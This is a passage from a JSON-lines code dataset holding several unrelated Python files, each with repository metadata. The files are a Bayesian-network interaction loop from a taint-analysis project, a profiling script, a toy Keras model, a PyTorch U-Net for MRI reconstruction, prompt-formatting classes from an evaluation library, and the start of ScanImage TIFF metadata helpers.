kwargs[\"loop_type\"] == \"random\":\n (final_snapshot, precision_list, stability_list,\n precision_inferred_list, current_asked, global_precisions) =\\\n random_loop([], snapshot_dict, BN_for_inference, graph_for_reference, 0,\n initial_asked, learned_evidence, initial_snapshot,\n initial_precision_list, initial_stability_list,\n initial_precision_inferred_list, list(), list(), graph_file)\n loop_time_list = [] # random_loop does not time its iterations\n\n draw_n_save(graph_file, BN_for_inference, precision_list, stability_list,\n precision_inferred_list, loop_type='random')\n\n # tactical loop\n elif kwargs[\"loop_type\"] == \"tactical\":\n (final_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, current_asked,\n global_precisions) =\\\n tactical_loop([], snapshot_dict, graph_for_reference, BN_for_inference,\n 0, initial_asked, learned_evidence, initial_updated_nodes,\n initial_snapshot, initial_precision_list, initial_stability_list,\n initial_precision_inferred_list, [], initial_window, graph_file)\n\n draw_n_save(graph_file, BN_for_inference, precision_list, stability_list,\n precision_inferred_list, loop_type='tactical')\n\n return loop_time_list, final_snapshot, current_asked, global_precisions\n\n\ndef one_pass(snapshot_dict, graph_file, graph_for_reference, BN_for_inference, lessons,\n prev_graph_states, prev_graph_file, debug=False):\n \"\"\"Bake a BN for a single graph and run the interaction loop on it.\n Here, we use state_names rather than APIs, since we would like to\n transfer knowledge regarding EVERY method, including user-defined ones.\"\"\"\n state_names = list(map(lambda node: node.name, 
BN_for_inference.states))\n\n learned_evidence = transfer_knowledge.main(prev_graph_states, state_names, lessons)\n\n if debug:\n print(\"# of lessons:\", len(lessons))\n print(graph_file, \"has\", len(state_names), \"states\")\n print(\"# of transferred evidence:\", len(learned_evidence))\n if prev_graph_file is not None:\n # for debugging transfer\n with open(prev_graph_file + '->' + graph_file + '.txt', 'w+') as f:\n f.write(json.dumps(learned_evidence, indent=4))\n if lessons != {}:\n with open(prev_graph_file+\"_lessons.txt\", 'w+') as f:\n f.write(json.dumps(lessons, indent=4))\n\n loop_time_list, final_snapshot, current_asked, global_precisions =\\\n single_loop(snapshot_dict, graph_file, graph_for_reference,\n BN_for_inference, learned_evidence, loop_type=\"tactical\")\n\n lessons = transfer_knowledge.learn(lessons, final_snapshot, current_asked) # update the lessons\n prev_graph_file = graph_file\n prev_graph_states = state_names\n\n return lessons, prev_graph_states, prev_graph_file, global_precisions\n\n\ndef evaluate_global_precision(snapshot_dict):\n num_of_correct_nodes = 0\n for _, snapshot in snapshot_dict.items():\n state_names = list(map(lambda tup: tup[0], snapshot))\n APIs = list(filter(lambda node: node in skip_funcs, state_names))\n num_of_correct_nodes += calculate_precision(APIs, snapshot)\n return (num_of_correct_nodes/TOTAL_NUM_OF_METHS) * 100\n\n\ndef draw_n_save_global_precision_graph(global_precision_list):\n \"\"\"precision graph를 그리는 함수.\"\"\"\n precision_figure = plt.figure(\"Global Precision\")\n ax = precision_figure.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n precision_figure.clf()\n plt.xlim(1, TOTAL_NUM_OF_METHS)\n plt.ylim(0, 100)\n plt.xlabel('# of interactions')\n plt.ylabel('% of correct nodes')\n plt.title(\"Global Precision development during interaction\")\n plt.plot([x for x in range(TOTAL_NUM_OF_METHS)], global_precision_list, 'b-')\n plt.savefig(\"global_precision_graph_\"+NOW+\".png\")\n\n\n# TODO: do we need APIs instead of state_names here?\ndef main():\n graph_files = find_pickled_graphs()\n graph_files = list(filter(lambda x: '_poor' not in x, graph_files))\n lessons = {}\n prev_graph_states = None\n prev_graph_file = None\n BN_queue = []\n snapshot_dict = {}\n global_precision_list = []\n\n print(\"Baking BNs...\")\n\n # 일단 쪼갠 그래프들을 전부 BN으로 굽자\n for graph_file in graph_files:\n graph_for_reference = nx.read_gpickle(graph_file)\n graph_for_reference.name = graph_file\n BN_for_inference = make_BN.main(graph_for_reference, filename=graph_file, stash_poor=True)\n if len(BN_for_inference.states) == 0: # the graph file contained only poor nodes!\n continue\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n initial_raw_snapshot = BN_for_inference.predict_proba({}, n_jobs=-1)\n initial_snapshot = make_names_and_params(state_names, initial_raw_snapshot)\n snapshot_dict[graph_file] = initial_snapshot\n BN_for_inference.name = graph_file\n BN_queue.append((graph_for_reference, BN_for_inference))\n\n recycled_graphs = deal_with_poor_nodes.main()\n\n i = 0\n for recycled_graph in recycled_graphs:\n graph_file = \"poor_\" + str(i)\n graph_for_reference = recycled_graph\n graph_for_reference.name = graph_file\n BN_for_inference = make_BN.main(graph_for_reference, filename=None, stash_poor=False)\n if len(BN_for_inference.states) == 0: # the graph file contained only poor nodes!\n continue\n state_names = list(map(lambda node: node.name, 
BN_for_inference.states))\n initial_raw_snapshot = BN_for_inference.predict_proba({}, n_jobs=-1)\n initial_snapshot = make_names_and_params(state_names, initial_raw_snapshot)\n snapshot_dict[graph_file] = initial_snapshot\n BN_for_inference.name = graph_file\n BN_queue.append((graph_for_reference, BN_for_inference))\n i += 1\n\n print(\"Baking BNs...done\")\n\n # evaluate the initial global precision of snapshot_dict and add it to global_precision_list\n if SOLUTION:\n global_precision_list.append(evaluate_global_precision(snapshot_dict))\n\n for graph, BN in BN_queue:\n lessons, prev_graph_states, prev_graph_file, global_precisions =\\\n one_pass(snapshot_dict, graph.name, graph, BN, lessons,\n prev_graph_states, prev_graph_file, debug=True)\n if SOLUTION:\n global_precision_list += global_precisions\n\n for _ in range(TOTAL_NUM_OF_METHS-len(global_precision_list)):\n global_precision_list.append(np.nan)\n\n if SOLUTION:\n draw_n_save_global_precision_graph(global_precision_list)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jeongsoolee09/Taint-Analysis","sub_path":"Code/BayesianNetwork/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":41351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30301053900","text":"import blb, yep\n\nclass ProfBLB(blb.BLB):\n def __init__(self, **kwargs):\n self.compute_estimate = 'stdev'\n self.reduce_bootstraps = 'mean'\n self.average = 'mean'\n blb.BLB.__init__(self, **kwargs)\n\nif __name__ == '__main__':\n data1 = range(10000)\n data2 = range(50000)\n data3 = range(100000)\n\n tester = ProfBLB()\n tester.run(data3)\n\n yep.start('cilk.prof')\n for i in xrange(500):\n tester.run(data3)\n yep.stop()\n \n \n","repo_name":"pbirsinger/SPARK_BLB","sub_path":"analysis/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"462115922","text":"import tensorflow as tf\nimport functools\n\ndef create(\n input_shape,\n num_neurons=100,\n num_layers=2,\n activation=tf.nn.relu,\n ):\n\n options = locals().copy()\n\n Dense = functools.partial(tf.keras.layers.Dense, activation=activation)\n\n layers = []\n for _ in range(num_layers):\n layers.append(Dense(num_neurons))\n layers.append(Dense(1, activation=tf.identity))\n\n model = tf.keras.models.Sequential(layers)\n\n return model, options\n","repo_name":"aamini/evidential-deep-learning","sub_path":"neurips2020/models/toy/deterministic.py","file_name":"deterministic.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":369,"dataset":"github-code","pt":"37"} +{"seq_id":"10080487989","text":"import math\nfrom typing import Callable, List, Optional, Tuple\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom direct.data import transforms as T\n\n\nclass ConvBlock(nn.Module):\n \"\"\"U-Net convolutional block.\n\n It consists of two convolution layers each followed by instance normalization, LeakyReLU activation and dropout.\n \"\"\"\n\n def __init__(self, in_channels: int, out_channels: int, dropout_probability: float):\n \"\"\"Inits ConvBlock.\n\n Parameters\n ----------\n in_channels: int\n Number of input channels.\n out_channels: int\n Number of output channels.\n dropout_probability: float\n Dropout probability.\n \"\"\"\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n 
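# Keep the configuration on the instance; __repr__ below reports these values.\n 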
self.dropout_probability = dropout_probability\n\n self.layers = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1, bias=False),\n nn.InstanceNorm2d(out_channels),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n nn.Dropout2d(dropout_probability),\n nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1, bias=False),\n nn.InstanceNorm2d(out_channels),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n nn.Dropout2d(dropout_probability),\n )\n\n def forward(self, input_data: torch.Tensor) -> torch.Tensor:\n \"\"\"Performs the forward pass of :class:`ConvBlock`.\n\n Parameters\n ----------\n input_data: torch.Tensor\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n return self.layers(input_data)\n\n def __repr__(self):\n \"\"\"Representation of :class:`ConvBlock`.\"\"\"\n return (\n f\"ConvBlock(in_channels={self.in_channels}, out_channels={self.out_channels}, \"\n f\"dropout_probability={self.dropout_probability})\"\n )\n\n\nclass TransposeConvBlock(nn.Module):\n \"\"\"U-Net Transpose Convolutional Block.\n\n It consists of one convolution transpose layers followed by instance normalization and LeakyReLU activation.\n \"\"\"\n\n def __init__(self, in_channels: int, out_channels: int):\n \"\"\"Inits :class:`TransposeConvBlock`.\n\n Parameters\n ----------\n in_channels: int\n Number of input channels.\n out_channels: int\n Number of output channels.\n \"\"\"\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n\n self.layers = nn.Sequential(\n nn.ConvTranspose2d(in_channels, out_channels, kernel_size=2, stride=2, bias=False),\n nn.InstanceNorm2d(out_channels),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n )\n\n def forward(self, input_data: torch.Tensor) -> torch.Tensor:\n \"\"\"Performs forward pass of :class:`TransposeConvBlock`.\n\n Parameters\n ----------\n input_data: torch.Tensor\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n return self.layers(input_data)\n\n def __repr__(self):\n \"\"\"Representation of \"class:`TransposeConvBlock`.\"\"\"\n return f\"ConvBlock(in_channels={self.in_channels}, out_channels={self.out_channels})\"\n\n\nclass UnetModel2d(nn.Module):\n \"\"\"PyTorch implementation of a U-Net model based on [1]_.\n\n References\n ----------\n\n .. [1] Ronneberger, Olaf, et al. “U-Net: Convolutional Networks for Biomedical Image Segmentation.” Medical Image Computing and Computer-Assisted Intervention – MICCAI 2015, edited by Nassir Navab et al., Springer International Publishing, 2015, pp. 234–41. 
Springer Link, https://doi.org/10.1007/978-3-319-24574-4_28.\n \"\"\"\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n num_filters: int,\n num_pool_layers: int,\n dropout_probability: float,\n ):\n \"\"\"Inits :class:`UnetModel2d`.\n\n Parameters\n ----------\n in_channels: int\n Number of input channels to the u-net.\n out_channels: int\n Number of output channels to the u-net.\n num_filters: int\n Number of output channels of the first convolutional layer.\n num_pool_layers: int\n Number of down-sampling and up-sampling layers (depth).\n dropout_probability: float\n Dropout probability.\n \"\"\"\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.num_filters = num_filters\n self.num_pool_layers = num_pool_layers\n self.dropout_probability = dropout_probability\n\n self.down_sample_layers = nn.ModuleList([ConvBlock(in_channels, num_filters, dropout_probability)])\n ch = num_filters\n for _ in range(num_pool_layers - 1):\n self.down_sample_layers += [ConvBlock(ch, ch * 2, dropout_probability)]\n ch *= 2\n self.conv = ConvBlock(ch, ch * 2, dropout_probability)\n\n self.up_conv = nn.ModuleList()\n self.up_transpose_conv = nn.ModuleList()\n for _ in range(num_pool_layers - 1):\n self.up_transpose_conv += [TransposeConvBlock(ch * 2, ch)]\n self.up_conv += [ConvBlock(ch * 2, ch, dropout_probability)]\n ch //= 2\n\n self.up_transpose_conv += [TransposeConvBlock(ch * 2, ch)]\n self.up_conv += [\n nn.Sequential(\n ConvBlock(ch * 2, ch, dropout_probability),\n nn.Conv2d(ch, self.out_channels, kernel_size=1, stride=1),\n )\n ]\n\n def forward(self, input_data: torch.Tensor) -> torch.Tensor:\n \"\"\"Performs forward pass of :class:`UnetModel2d`.\n\n Parameters\n ----------\n input_data: torch.Tensor\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n stack = []\n output = input_data\n\n # Apply down-sampling layers\n for _, layer in enumerate(self.down_sample_layers):\n output = layer(output)\n stack.append(output)\n output = F.avg_pool2d(output, kernel_size=2, stride=2, padding=0)\n\n output = self.conv(output)\n\n # Apply up-sampling layers\n for transpose_conv, conv in zip(self.up_transpose_conv, self.up_conv):\n downsample_layer = stack.pop()\n output = transpose_conv(output)\n\n # Reflect pad on the right/bottom if needed to handle odd input dimensions.\n padding = [0, 0, 0, 0]\n if output.shape[-1] != downsample_layer.shape[-1]:\n padding[1] = 1 # Padding right\n if output.shape[-2] != downsample_layer.shape[-2]:\n padding[3] = 1 # Padding bottom\n if sum(padding) != 0:\n output = F.pad(output, padding, \"reflect\")\n\n output = torch.cat([output, downsample_layer], dim=1)\n output = conv(output)\n\n return output\n\n\nclass NormUnetModel2d(nn.Module):\n \"\"\"Implementation of a Normalized U-Net model.\"\"\"\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n num_filters: int,\n num_pool_layers: int,\n dropout_probability: float,\n norm_groups: int = 2,\n ):\n \"\"\"Inits :class:`NormUnetModel2d`.\n\n Parameters\n ----------\n in_channels: int\n Number of input channels to the u-net.\n out_channels: int\n Number of output channels to the u-net.\n num_filters: int\n Number of output channels of the first convolutional layer.\n num_pool_layers: int\n Number of down-sampling and up-sampling layers (depth).\n dropout_probability: float\n Dropout probability.\n norm_groups: int,\n Number of normalization groups.\n \"\"\"\n super().__init__()\n\n self.unet2d = UnetModel2d(\n in_channels=in_channels,\n 
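# the wrapped plain 2D U-Net; this class adds group normalization and padding around it\n 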
out_channels=out_channels,\n num_filters=num_filters,\n num_pool_layers=num_pool_layers,\n dropout_probability=dropout_probability,\n )\n\n self.norm_groups = norm_groups\n\n @staticmethod\n def norm(input_data: torch.Tensor, groups: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:\n \"\"\"Performs group normalization.\"\"\"\n # group norm\n b, c, h, w = input_data.shape\n input_data = input_data.reshape(b, groups, -1)\n\n mean = input_data.mean(-1, keepdim=True)\n std = input_data.std(-1, keepdim=True)\n\n output = (input_data - mean) / std\n output = output.reshape(b, c, h, w)\n\n return output, mean, std\n\n @staticmethod\n def unnorm(input_data: torch.Tensor, mean: torch.Tensor, std: torch.Tensor, groups: int) -> torch.Tensor:\n b, c, h, w = input_data.shape\n input_data = input_data.reshape(b, groups, -1)\n return (input_data * std + mean).reshape(b, c, h, w)\n\n @staticmethod\n def pad(input_data: torch.Tensor) -> Tuple[torch.Tensor, Tuple[List[int], List[int], int, int]]:\n _, _, h, w = input_data.shape\n w_mult = ((w - 1) | 15) + 1\n h_mult = ((h - 1) | 15) + 1\n w_pad = [math.floor((w_mult - w) / 2), math.ceil((w_mult - w) / 2)]\n h_pad = [math.floor((h_mult - h) / 2), math.ceil((h_mult - h) / 2)]\n\n output = F.pad(input_data, w_pad + h_pad)\n return output, (h_pad, w_pad, h_mult, w_mult)\n\n @staticmethod\n def unpad(\n input_data: torch.Tensor,\n h_pad: List[int],\n w_pad: List[int],\n h_mult: int,\n w_mult: int,\n ) -> torch.Tensor:\n return input_data[..., h_pad[0] : h_mult - h_pad[1], w_pad[0] : w_mult - w_pad[1]]\n\n def forward(self, input_data: torch.Tensor) -> torch.Tensor:\n \"\"\"Performs forward pass of :class:`NormUnetModel2d`.\n\n Parameters\n ----------\n input_data: torch.Tensor\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n\n output, mean, std = self.norm(input_data, self.norm_groups)\n output, pad_sizes = self.pad(output)\n output = self.unet2d(output)\n\n output = self.unpad(output, *pad_sizes)\n output = self.unnorm(output, mean, std, self.norm_groups)\n\n return output\n\n\nclass Unet2d(nn.Module):\n \"\"\"PyTorch implementation of a U-Net model for MRI Reconstruction.\"\"\"\n\n def __init__(\n self,\n forward_operator: Callable,\n backward_operator: Callable,\n num_filters: int,\n num_pool_layers: int,\n dropout_probability: float,\n skip_connection: bool = False,\n normalized: bool = False,\n image_initialization: str = \"zero_filled\",\n **kwargs,\n ):\n \"\"\"Inits :class:`Unet2d`.\n\n Parameters\n ----------\n forward_operator: Callable\n Forward Operator.\n backward_operator: Callable\n Backward Operator.\n num_filters: int\n Number of first layer filters.\n num_pool_layers: int\n Number of pooling layers.\n dropout_probability: float\n Dropout probability.\n skip_connection: bool\n If True, skip connection is used for the output. Default: False.\n normalized: bool\n If True, Normalized Unet is used. Default: False.\n image_initialization: str\n Type of image initialization. 
Default: \"zero-filled\".\n kwargs: dict\n \"\"\"\n super().__init__()\n extra_keys = kwargs.keys()\n for extra_key in extra_keys:\n if extra_key not in [\n \"sensitivity_map_model\",\n \"model_name\",\n ]:\n raise ValueError(f\"{type(self).__name__} got key `{extra_key}` which is not supported.\")\n self.unet: nn.Module\n if normalized:\n self.unet = NormUnetModel2d(\n in_channels=2,\n out_channels=2,\n num_filters=num_filters,\n num_pool_layers=num_pool_layers,\n dropout_probability=dropout_probability,\n )\n else:\n self.unet = UnetModel2d(\n in_channels=2,\n out_channels=2,\n num_filters=num_filters,\n num_pool_layers=num_pool_layers,\n dropout_probability=dropout_probability,\n )\n self.forward_operator = forward_operator\n self.backward_operator = backward_operator\n self.skip_connection = skip_connection\n self.image_initialization = image_initialization\n self._coil_dim = 1\n self._spatial_dims = (2, 3)\n\n def compute_sense_init(self, kspace: torch.Tensor, sensitivity_map: torch.Tensor) -> torch.Tensor:\n r\"\"\"Computes sense initialization :math:`x_{\\text{SENSE}}`:\n\n .. math::\n x_{\\text{SENSE}} = \\sum_{k=1}^{n_c} {S^{k}}^* \\times y^k\n\n where :math:`y^k` denotes the data from coil :math:`k`.\n\n Parameters\n ----------\n kspace: torch.Tensor\n k-space of shape (N, coil, height, width, complex=2).\n sensitivity_map: torch.Tensor\n Sensitivity map of shape (N, coil, height, width, complex=2).\n\n Returns\n -------\n input_image: torch.Tensor\n Sense initialization :math:`x_{\\text{SENSE}}`.\n \"\"\"\n input_image = T.complex_multiplication(\n T.conjugate(sensitivity_map),\n self.backward_operator(kspace, dim=self._spatial_dims),\n )\n input_image = input_image.sum(self._coil_dim)\n return input_image\n\n def forward(\n self,\n masked_kspace: torch.Tensor,\n sensitivity_map: Optional[torch.Tensor] = None,\n ) -> torch.Tensor:\n \"\"\"Computes forward pass of Unet2d.\n\n Parameters\n ----------\n masked_kspace: torch.Tensor\n Masked k-space of shape (N, coil, height, width, complex=2).\n sensitivity_map: torch.Tensor\n Sensitivity map of shape (N, coil, height, width, complex=2). Default: None.\n\n Returns\n -------\n output: torch.Tensor\n Output image of shape (N, height, width, complex=2).\n \"\"\"\n if self.image_initialization == \"sense\":\n if sensitivity_map is None:\n raise ValueError(\"Expected sensitivity_map not to be None with 'sense' image_initialization.\")\n input_image = self.compute_sense_init(\n kspace=masked_kspace,\n sensitivity_map=sensitivity_map,\n )\n elif self.image_initialization == \"zero_filled\":\n input_image = self.backward_operator(masked_kspace, dim=self._spatial_dims).sum(self._coil_dim)\n else:\n raise ValueError(\n f\"Unknown image_initialization. Expected `sense` or `zero_filled`. \"\n f\"Got {self.image_initialization}.\"\n )\n\n output = self.unet(input_image.permute(0, 3, 1, 2)).permute(0, 2, 3, 1)\n if self.skip_connection:\n output += input_image\n return output\n","repo_name":"NKI-AI/direct","sub_path":"direct/nn/unet/unet_2d.py","file_name":"unet_2d.py","file_ext":"py","file_size_in_byte":15129,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"37"} +{"seq_id":"38170320881","text":"\"\"\"\nA core part of the evalugator model is that the Batches and Piles that it works\nwith do NOT represent the \"final\" form of a dataset passed to a model. Why?\nBecause e.g. 
the abstract form of a multiple-choice question exists with some\nright and wrong answers exists independent of things like which order the\noptions are presented in, what the style is (\"A\" vs \"1.\" vs \"(A)\" vs ...), and\nany prompt prefixes/suffixes/templates that surround the questions. The\nformatters in this file are the core interface between the \"abstract\" piles and\nconcrete-strings-or-message-lists-you-could-pass-into-an-LLM.\n\"\"\"\n\n\nfrom typing import List, Tuple, Union, cast, Sequence\n\nimport numpy as np\n\nfrom evalugator.structs import (\n ExportTemplates,\n FormattedAnswerInfo,\n FormattedMCQAnswerInfo,\n FormattedQAAnswerInfo,\n MCQuestionExportTemplate,\n QA,\n MCQuestion,\n Message,\n ModelInput,\n QAExportTemplate,\n Question,\n ExportExtension,\n QuestionExportTemplate,\n Trial,\n)\nfrom evalugator.utils import render_jinja_string\nfrom evalugator.formatters_utils import (\n make_template_extension_renderer,\n PREFIX_EXTENSION_FN_TABLE,\n SUFFIX_EXTENSION_FN_TABLE,\n mc_option_format,\n)\n\n\"\"\"\nThis file is about taking Trial and subclasses of it (as defined in structs.py)\nand formatting them into strings (including answer-choice order randomization\netc.)\n\"\"\"\n\n\nclass TrialFormatter:\n def __init__(self, seed=0):\n self.seed = seed\n\n def format(self, trial: Trial):\n raise NotImplementedError\n\n def shuffle(self, l):\n np.random.seed(self.seed)\n permuted_indices = np.random.permutation(len(l))\n if len(l) > 0 and isinstance(l[0], list):\n # we have a list of lists, apply same shuffle to all\n assert all(\n [len(sublist) == len(l[0]) for sublist in l]\n ), \"list of lists in TrialFormatter.shuffle must have all same length\"\n permuted_indices = np.random.permutation(len(l[0]))\n l = [np.array(sublist)[permuted_indices].tolist() for sublist in l]\n else:\n l = np.array(l)[permuted_indices].tolist()\n self.seed += 1\n return l\n\n def apply_template_extension(\n self,\n template_extension: ExportExtension,\n rendered: Union[str, List[Message]],\n **template_vars,\n ) -> Union[str, List[Message]]:\n ext: Union[str, List[Message]] = self.render_from_template(\n template_extension.template, **template_vars\n )\n if template_extension.location == \"prefix\":\n rendered = make_template_extension_renderer(PREFIX_EXTENSION_FN_TABLE)(\n rendered, ext\n )\n elif template_extension.location == \"suffix\":\n rendered = make_template_extension_renderer(SUFFIX_EXTENSION_FN_TABLE)(\n rendered, ext\n )\n else:\n raise ValueError(\n f\"template_extension.location must be 'prefix' or 'suffix', not {template_extension.location}\"\n )\n return rendered\n\n def render_from_template(\n self,\n template: Union[str, List[Message]],\n template_extensions=[],\n **template_vars,\n ) -> Union[str, List[Message]]:\n if isinstance(template, str):\n rendered = render_jinja_string(template, **template_vars)\n else:\n assert isinstance(template, list)\n rendered = [\n Message(\n role=message.role,\n content=render_jinja_string(\n message.content,\n **template_vars,\n ),\n )\n for message in template\n ]\n for template_extension in template_extensions:\n rendered = self.apply_template_extension(\n template_extension, rendered, **template_vars\n )\n return rendered\n\n\nclass QuestionFormatter(TrialFormatter):\n def __init__(\n self,\n seed=0,\n template: Union[str, List[Message]] = \"{{_question_body}}\",\n template_extensions: List[ExportExtension] = [],\n **extra_template_vars,\n ):\n super().__init__(seed)\n self.template = template\n self.template_extensions = 
template_extensions\n self.extra_template_vars = extra_template_vars\n\n @staticmethod\n def from_templates(\n template: QuestionExportTemplate,\n extensions: List[ExportExtension],\n templates: ExportTemplates,\n ):\n return QuestionFormatter(\n seed=template.seed,\n template=template.template_messages,\n template_extensions=extensions,\n **templates.define_your_special_variables,\n )\n\n def format(self, question: Question) -> Tuple[Union[str, List[Message]], None]:\n template_vars = self.extra_template_vars\n template_vars[\"_question_body\"] = question.body\n return (\n self.render_from_template(\n self.template, self.template_extensions, **template_vars\n ),\n None,\n )\n\n\nclass QAFormatter(QuestionFormatter):\n def __init__(\n self,\n seed=0,\n template: Union[str, List[Message]] = \"{{_question_body}}\",\n template_extensions: List[ExportExtension] = [],\n **extra_template_vars,\n ):\n super().__init__(seed)\n self.template = template\n self.template_extensions = template_extensions\n self.extra_template_vars = extra_template_vars\n\n @staticmethod\n def from_templates(\n template: QAExportTemplate,\n extensions: List[ExportExtension],\n templates: ExportTemplates,\n ):\n return QAFormatter(\n seed=template.seed,\n template=template.template_messages,\n template_extensions=extensions,\n **templates.define_your_special_variables,\n )\n\n def format(self, qa: QA) -> Tuple[Union[str, List[Message]], FormattedQAAnswerInfo]:\n template_vars = self.extra_template_vars\n template_vars[\"_question_body\"] = qa.body\n template_vars[\"_ideal_answers\"] = qa.ideal_answers\n answer_info = FormattedQAAnswerInfo(ideal_answers=qa.ideal_answers)\n return (\n self.render_from_template(\n self.template, self.template_extensions, **template_vars\n ),\n answer_info,\n )\n\n\nclass MCQuestionFormatter(QuestionFormatter):\n def __init__(\n self,\n seed: int = 0,\n style: str = \"(A)\",\n styles_in_ideal_answers: List[str] = [\"(A)\", \"A\", \"A)\"],\n template: Union[\n str, List[Message]\n ] = \"{{_question_body}}\\n{{_answer_lines}}\\n\\nAnswer: (\",\n template_extensions: List[ExportExtension] = [],\n **extra_template_vars,\n ):\n super().__init__(seed)\n self.style = style\n if \"__text__\" in styles_in_ideal_answers:\n self.allow_text_answer = True\n else:\n self.allow_text_answer = False\n self.styles_in_ideal_answers = [\n style for style in styles_in_ideal_answers if style != \"__text__\"\n ]\n self.template = template\n self.template_extensions = template_extensions\n self.extra_template_vars = extra_template_vars\n\n @staticmethod\n def from_templates(\n template: MCQuestionExportTemplate,\n extensions: List[ExportExtension],\n templates: ExportTemplates,\n ):\n return MCQuestionFormatter(\n seed=template.seed,\n style=template.answer_style,\n styles_in_ideal_answers=template.answer_styles_in_ideal,\n template=template.template_messages,\n template_extensions=extensions,\n **templates.define_your_special_variables,\n )\n\n def format(\n self, question: MCQuestion\n ) -> Tuple[Union[str, List[Message]], FormattedMCQAnswerInfo]:\n correct_by_index = [1 for _ in question.choices_right] + [\n 0 for _ in question.choices_wrong\n ]\n choice_texts, correct_by_index = self.shuffle(\n [question.choices_right + question.choices_wrong, correct_by_index]\n )\n choice_lines = [\n f\"{mc_option_format(i, style=self.style)} {choice_text}\"\n for i, choice_text in enumerate(choice_texts)\n ]\n ideal_answers = [\n mc_option_format(i, style=style)\n for style in self.styles_in_ideal_answers\n for i, correct in 
enumerate(correct_by_index)\n if correct == 1\n ]\n if self.allow_text_answer:\n ideal_answers.append(question.choices_right[0])\n wrong_answers = [\n mc_option_format(i, style=style)\n for style in self.styles_in_ideal_answers\n for i, correct in enumerate(correct_by_index)\n if correct == 0\n ]\n answer_lines = \"\\n\".join(choice_lines)\n template_vars = self.extra_template_vars\n template_vars[\"_question_body\"] = question.body\n template_vars[\"_answer_lines\"] = answer_lines\n template_vars[\"_ideal_answers\"] = ideal_answers\n # question_str = question.body + \"\\n\" + \"\\n\".join(choice_lines) + self.suffix\n formatted_answer_info = FormattedMCQAnswerInfo(\n ideal_answers=ideal_answers,\n wrong_answers=wrong_answers,\n styles_accepted=self.styles_in_ideal_answers,\n text_accepted=self.allow_text_answer,\n style_default=self.style,\n position_to_answer_text={\n i: choice_text for i, choice_text in enumerate(choice_texts)\n },\n position_to_correct={\n i: correct for i, correct in enumerate(correct_by_index)\n },\n position_to_answer_option={\n i: mc_option_format(i, style=self.style)\n for i, _ in enumerate(choice_texts)\n },\n )\n return (\n self.render_from_template(\n self.template, self.template_extensions, **template_vars\n ),\n formatted_answer_info,\n )\n\n\ndef get_rendered_and_answer_infos_from_batch(\n batch, formatter: TrialFormatter, trial_type\n) -> Tuple[Sequence[ModelInput], Sequence[FormattedAnswerInfo]]:\n rendered = []\n answer_infos = []\n for trial in batch.data.trials:\n trial = cast(trial_type, trial)\n render, answer_info = formatter.format(trial)\n rendered.append(render)\n answer_infos.append(answer_info)\n return rendered, answer_infos\n","repo_name":"LRudL/evalugator","sub_path":"evalugator/formatters.py","file_name":"formatters.py","file_ext":"py","file_size_in_byte":10629,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"32721171574","text":"import json\nimport numpy as np\nfrom skimage import io\n\n# Utility functions for working with ScanImage tiff files\n\n## EXTRACT METADATA ##\ndef getSIbasicMetadata(metadat):\n\n #initilize dict\n metadict = {}\n\n if type(metadat) == dict: #the output of read_scanimage_metadata() from the tifffile module is a dict\n nCh = metadat['SI.hChannels.channelSave']\n fpsscan = metadat['SI.hRoiManager.scanFrameRate']\n discardFBFrames = metadat['SI.hFastZ.discardFlybackFrames']\n nDiscardFBFrames = metadat['SI.hFastZ.numDiscardFlybackFrames']\n fpv = metadat['SI.hFastZ.numFramesPerVolume']\n nVols = metadat['SI.hFastZ.numVolumes']\n stackZStepSize = metadat['SI.hStackManager.stackZStepSize']\n scanVolumeRate = metadat['SI.hRoiManager.scanVolumeRate']\n [p00, p10, p01, p11] = metadat['SI.hRoiManager.imagingFovUm']\n\n else:\n for i, line in enumerate(metadat.split('\\n')):\n\n if not 'SI.' 
in line: continue\n # extract version\n if 'VERSION_' in line: print(line)\n\n # get channel info\n if 'channelSave' in line:\n #print(line)\n if not '[' in line:\n nCh = 1\n else:\n strchanlist = line.split('=')[-1].strip()\n try: chanlist = [int(i) for i in strchanlist.strip('][').split(' ')] \n except ValueError: chanlist = [int(i) for i in strchanlist.strip('][').split(';')] \n nCh = len(chanlist)\n\n if 'scanFrameRate' in line:\n fpsscan = float(line.split('=')[-1].strip())\n\n\n #if 'hFastZ' in line:\n if 'discardFlybackFrames' in line:\n discardFBFrames = line.split('=')[-1].strip()\n\n if 'numDiscardFlybackFrames' in line:\n nDiscardFBFrames = int(line.split('=')[-1].strip())\n\n if 'numFramesPerVolume' in line:\n fpv = int(line.split('=')[-1].strip())\n\n\n if 'numVolumes' in line:\n nVols = int(line.split('=')[-1].strip())\n\n if 'hStackManager.stackZStepSize' in line:\n stackZStepSize = float(line.split('=')[-1].strip())\n\n if 'hRoiManager.scanVolumeRate' in line:\n scanVolumeRate = float(line.split('=')[-1].strip())\n\n if 'SI.hRoiManager.imagingFovUm' in 